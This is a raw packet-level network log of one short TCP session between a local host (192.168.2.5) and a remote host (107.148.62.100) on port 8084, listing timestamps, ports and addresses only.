Dec 18, 2024 13:31:58.157211065 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.158482075 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.158497095 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.158539057 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.161998034 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.165908098 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.165970087 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.166012049 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.166028023 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.166094065 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.173358917 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.175322056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.175357103 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.175401926 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.180910110 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.180968046 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.182727098 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.182744026 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.182813883 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.186537027 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.188538074 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.188560963 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.188622952 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.233108997 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.233129978 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.233259916 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.234855890 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.234950066 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.282021999 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.282469988 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.282577991 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.283155918 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.288710117 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.288774967 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.289453983 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.290338039 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.290376902 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.296516895 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.296920061 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.296979904 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.528012037 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.528040886 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.528101921 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.529588938 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.531133890 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.531152964 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.531203032 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.534123898 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.534142017 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.534177065 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.537189960 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.537206888 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.537249088 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.538722038 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.538777113 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.540179014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.541702032 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.541773081 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.544487953 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.544812918 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.544828892 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.544872999 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.548038960 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.548054934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.548101902 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.550837040 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.550853968 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.550889969 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.552505016 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.552556992 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.554030895 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.555569887 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.555620909 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.557087898 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.558505058 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.558521032 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.558563948 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.561536074 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.561553001 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.561686993 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.564563990 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.564582109 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.564625025 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.566232920 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.566291094 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.567498922 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.569293022 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.569375038 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.570512056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.572154045 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.572171926 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.572210073 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.575073004 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.575140953 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.575887918 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.575905085 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.575968981 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.577723026 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.578978062 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.579067945 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.579077005 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.581912041 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.581929922 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.581964016 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.584973097 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.584991932 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.585022926 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.587841988 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.587913036 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.588546991 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.589678049 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.589725971 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.591188908 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.592799902 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.592818022 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.592854977 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.595772982 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.595789909 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.595824957 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.599230051 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.599247932 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.599302053 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.600230932 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.600245953 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.600282907 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.606465101 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.606483936 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.606499910 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.606517076 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.606530905 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.606534004 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.606564045 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.606610060 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.607954979 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.607973099 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.608031034 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.608102083 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.609599113 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.609654903 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.610727072 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.610748053 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.610764027 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.610780954 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.610800028 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.610826969 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.612226963 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.612243891 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.612257957 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.612313032 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.613831997 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.613847971 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.613862991 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.613898039 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.613924980 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.615170956 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.615187883 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.615202904 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.615236044 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.616650105 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.616667032 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.616679907 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.616699934 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.616728067 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.618412971 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.618431091 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.618443966 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.618459940 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.618493080 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.618522882 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.623934984 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.623985052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.624033928 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.633274078 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.634891987 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.634908915 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.634952068 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.663537025 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.663594961 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.663847923 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.705471992 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.719558954 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.719578981 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.719659090 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.721148968 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.748509884 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.748521090 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.748565912 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.750195026 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.750207901 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.750320911 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.751534939 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.751543045 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.751615047 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.753046036 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.753092051 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.754595995 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.763731003 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.763744116 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.763823986 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.765244007 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.765256882 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.765265942 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.765276909 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.765302896 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.765343904 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.777626991 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.777699947 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.777956963 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.778352976 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.778407097 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.781038046 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.781404018 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.781501055 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.781960011 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.782408953 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.782459021 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.782548904 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.783227921 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.783293962 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.785319090 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.785598040 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.785651922 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.786195993 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.802810907 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.802823067 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.802891970 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.804008007 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.804073095 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.805252075 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.805263042 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.805319071 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.806608915 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.810058117 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.810071945 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.810125113 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.811263084 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.811328888 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.812539101 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.812556982 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.812617064 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.813643932 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.822454929 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.822525978 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.822834015 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.823945045 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.824004889 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.835614920 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.835890055 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.835946083 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.836460114 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.883407116 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.929943085 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.929958105 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.929969072 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.930047035 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.941921949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.941970110 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.943295002 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.944413900 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.944472075 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.945713043 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.945839882 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.945905924 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.947266102 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.947573900 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.947628975 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.948156118 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.948338032 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.948389053 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.948787928 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.949409962 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.949470997 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.962101936 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.962472916 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.962533951 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.962769032 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.995757103 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.995850086 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:58.997198105 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.997210026 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:58.997263908 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.002608061 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.002620935 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.002799988 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.004201889 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.009495974 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.009510994 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.009568930 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.009665012 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.009686947 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.009700060 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.009711027 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.009752035 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.009778976 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.019100904 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.019114017 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.019126892 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.019169092 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.019185066 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.020450115 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.021573067 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.021629095 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.022489071 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.024354935 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.024415970 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.025301933 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.026454926 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.026519060 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.028664112 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.029870987 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.029882908 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.029942036 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.036384106 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.036565065 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.036679983 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.037161112 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.037239075 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.037326097 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.038000107 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.038063049 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.038691044 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.049843073 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.049941063 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.050092936 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.050726891 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.050818920 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.146692038 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.147303104 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.147475004 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.147488117 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.147551060 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.147574902 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.148407936 CET	8084	49705	107.148.62.100	192.168.2.5
